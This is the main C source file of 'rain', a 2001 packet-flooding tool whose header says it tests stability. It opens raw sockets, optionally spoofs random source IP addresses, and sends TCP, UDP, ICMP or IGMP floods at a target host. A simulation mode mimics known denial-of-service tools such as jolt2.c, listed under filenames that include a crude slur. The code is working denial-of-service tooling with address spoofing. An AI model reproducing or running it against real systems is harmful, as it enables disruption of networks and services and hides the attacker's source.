/*--------------------------------------------------*
 * $Header: /usr/src/Projects/rain/RCS/rain_main.c,v 1.1 2001/06/11 20:44:09 root Exp root $
 * $Author: root $
 * rain_main.c
 * rain - by Evil (mystic@tenebrous.com)
 * A flexible packet flooder for testing stability.
 * Copyright(c) 2001
 * Licensed under the GNU/GPL
 *
 * $Log: rain_main.c,v $
 * Revision 1.1  2001/06/11 20:44:09  root
 * Initial revision
 *
 * Revision 1.1  2001/06/11 02:59:26  root
 * Initial revision
 *
 *-------------------------------------------------*/

#include "rain_common.h"

void banner(void) {
  printf("\n[ rain %s by Evil (mystic@tenebrous.com) ] [pid:%d]\n", RAIN_VERSION, getpid());
  return;
}


int main(int argc, char **argv) {
  int raw_socket;
  struct sockaddr_in target, source;
  u_short have_target_host = FALSE;
  struct pkt_info *pkt = malloc(sizeof(struct pkt_info));
  struct pkt_info_icmp *pkticmp  = malloc(sizeof(struct pkt_info_icmp));
#if defined(RAIN_IPV6)
  struct pkt_info_icmp6 *pkticmp6 = malloc(sizeof(struct pkt_info_icmp6));
#endif
  struct pkt_info_igmp *pktigmp  = malloc(sizeof(struct pkt_info_igmp));
  struct pkt_info_tcp  *pkttcp   = malloc(sizeof(struct pkt_info_tcp));
  static unsigned char siminfo[6][16] = {
    "fawx2.c",
    "bloop.c",
    "jolt2.c",
    "trash2.c",
    "raped.c"
  };


  /* Make stdout unbuffered, so that text is displayed immediately */
  setvbuf(stdout,NULL,_IONBF,0);


  signal_init();  /* signal handling initialization */


/* set defaults for all packet types: */
  set_defaults(pkt, 
               pkttcp,
               pkticmp,
#if defined(RAIN_IPV6)
               pkticmp6,
#endif
               pktigmp);

  packets_sent = 0;

  

  


  /* process command line arguments */
  /*---------------------------------------------------------------------------------------------------*/
  parse_command_line(argc, 
                     argv, 
                     pkt, 
                     pkttcp, 
                     pkticmp, 
    #if defined(RAIN_IPV6)
                     pkticmp6,
    #endif 
                     pktigmp, 
                     &have_target_host);
  /*---------------------------------------------------------------------------------------------------*/

  /* display banner */
  banner();


  /* if no protocol was specified, we'll do that now: */
  if(pkt->type == DEFAULT) pkt->type = TCP;


  /* Die with usage if user didn't specify a target host (the only mandatory option) */
  if(have_target_host == FALSE) DieWithUsage(argv[0]);


  /* Make sure length of payload doesn't exceed packetsize */
  if(strlen(pkt->payload) > (packetsize-128))
    DieWithError("Payload too large", R_TOOBIG);

  /* Resolve target host and set the port number */
  if(resolv(pkt->daddr, &target) < 0) DieWithError("could not resolve target hostname", TRY_AGAIN);
  target.sin_port   = htons(pkt->dport);

  /* Resolve source host  */
  if(pkt->randip == 0) {
    if(resolv(pkt->saddr, &source) < 0) 
      DieWithError("could not resolve source hostname", TRY_AGAIN);
  } else {
    source.sin_addr.s_addr = rand();
    strcpy(pkt->saddr, inet_ntoa(source.sin_addr));
  }

  source.sin_port = htons(pkt->sport);   

  if(getuid() == 0) {
    /* Create a RAW socket */ 
    #if defined(RAIN_IPV6)
      if((raw_socket = socket(AF_INET6, SOCK_RAW, IPPROTO_RAW)) < 0)
        DieWithError("raw socket() (ipv6)", 0);
    #else
      if((raw_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
        DieWithError("raw socket()", 0);
    #endif
  }



 
  /* set the start-time */
  send_start = time(NULL);

  
  if(pkt->simulate == 1) printf("\nsimulation mode: %s", siminfo[pkt->simtype]);
  printf("\n");
  printf("source host/port: ");
  if(pkt->randip == 1) printf("random hosts / ");
  else printf("%s / ",pkt->saddr); 
  printf("%s\n", service_name(pkt->sport, pkt));
  printf("target host/port: %s / %s\n", pkt->daddr, service_name(pkt->dport, pkt));
  printf("packet style....: ");
  switch(pkt->type) {
    case TCPCONNECT:{ printf("TCP connection (streamed)\n"); break; }
    case TCPSTREAM:{ printf("TCP streaming\n"); break; }
    case TCP:{ tcp_info_init(pkttcp); 
               if(tcpinfo[0] == 0)
                 printf("TCP (no flags set)\n");
               else
                 printf("TCP (%s)\n", tcpinfo);
               break;
             }

    case UDP:{ if(getuid() == 0) { printf("UDP\n"); break; } else { printf("UDP (non-spoofed)\n"); break; }  }
    case ICMP:{ icmp_info_init(pkticmp); printf("ICMP%s\n", icmpinfo[pkticmp->type][pkticmp->code]); break; }
    case IGMP:{ igmp_info_init(pktigmp); printf("IGMP%s\n", igmpinfo[pktigmp->type][pktigmp->code]); break; }
    default:{ DieWithError("You must specify a protocol to use",R_NOPROTO); } /* shouldn't be reached */ 
  }


  if(verbose > 0) {
    printf("flags...........: tos=%s; frag offset=%s;", 
            hex2str(pkt->tos), pkt->frag == 1 ? hex2str(pkt->frag_off) : "none");
    if(pkt->dfrag == 1) printf(" DF;");
  }
  if(verbose > 1) {
    printf("\n                : ttl=%d; id=%s;", pkt->ttl, (pkt->id_of == 1 ? "overflow" : itoa(pkt->id)));


    switch(pkt->type) {
      case TCP:
      case TCPSTREAM:
      case TCPCONNECT:{ printf(" window size=%d; ack sequence=%s;", pkttcp->window,
                                (pkttcp->ack_seq == 0 ? "overflow" : itoa(pkttcp->ack_seq)));
                                                 
                        break;
                      }
      case ICMP:{ 
        if((verbose > 1) && (pkticmp->type == 11)) {
          time_t now = time(NULL);
          char *mytime = ctime(&now);
           mytime = chop(mytime);
           printf("\n                : otime, rtime, ttime=%s;", mytime); 

        }
           if(ctoi(pkt->gaddr[0]) == 0)
             printf("\n                : gateway=random;");
	   else
             printf("\n                : gateway=%s;", pkt->gaddr);
        break;
      }

      case IGMP:{ 
                  printf(" group=%s; ", pkt->gaddr);
                  if(pktigmp->type == 17) 
                    printf("\n                : max response time=%d;", pktigmp->code);
                  break;
                } 
   }
  }


  if(verbose > 0) printf("\n");


  if(verbose > 1) { printf("payload.........: %s\n", pkt->payload); } 
 


  /* start the timer: */
  send_start = time(NULL);

  printf("\nShowering %s (%.1fk) drops; Hit CTRL+C to stop\n", int2str(pkt->num), ((float)packetsize/1024));


  /* send packets */
  switch(pkt->type) {
    case TCPCONNECT: {
      if(tcp_shower_connect(&target, pkt) < 0) DieWithError("error in TCP stream shower", 0);
      raise(SIGINT);
      break;
    }
    case TCPSTREAM: {
      if(tcp_shower_stream(&target, pkt) < 0) DieWithError("error in TCP stream shower", 0);
      raise(SIGINT);
      break;
    }
    case TCP:{
      if(tcp_shower(raw_socket, &source, &target, pkt, pkttcp) < 0) DieWithError("error in TCP shower", 0);
      raise(SIGINT);
      break;
    }
    case UDP:{
      if(getuid() == 0) { /* root */
        if(udp_shower(raw_socket, &source, &target, pkt) < 0) DieWithError("error in UDP shower", 0);
        raise(SIGINT);
        break;
      } else { /* non-root */
        if(udp_shower_normal(&target, pkt) < 0) DieWithError("error in UDP shower (non-spoofed)", 0);
        raise(SIGINT);
        break;
      }
    }
    case ICMP:{
      if(icmp_shower(raw_socket, &source, &target, pkt, pkticmp) < 0) DieWithError("error in ICMP shower", 0);
      raise(SIGINT);
      break;
    }
    case IGMP:{
      if(igmp_shower(raw_socket, &source, &target, pkt, pktigmp) < 0) DieWithError("error in IGMP shower", 0);
      raise(SIGINT);
      break;
    }
    default:{ DieWithError("You must specify a protocol to use", R_NOPROTO); }
  }

  return 0;
}

static const char author[]    = {"$Creator: rain by Evil (mystic@tenebrous.com) $"};
static const char copyright[] = {"$Copyright: (c) 2001 mystic@tenebrous.com $"};
/* rain_main.c */
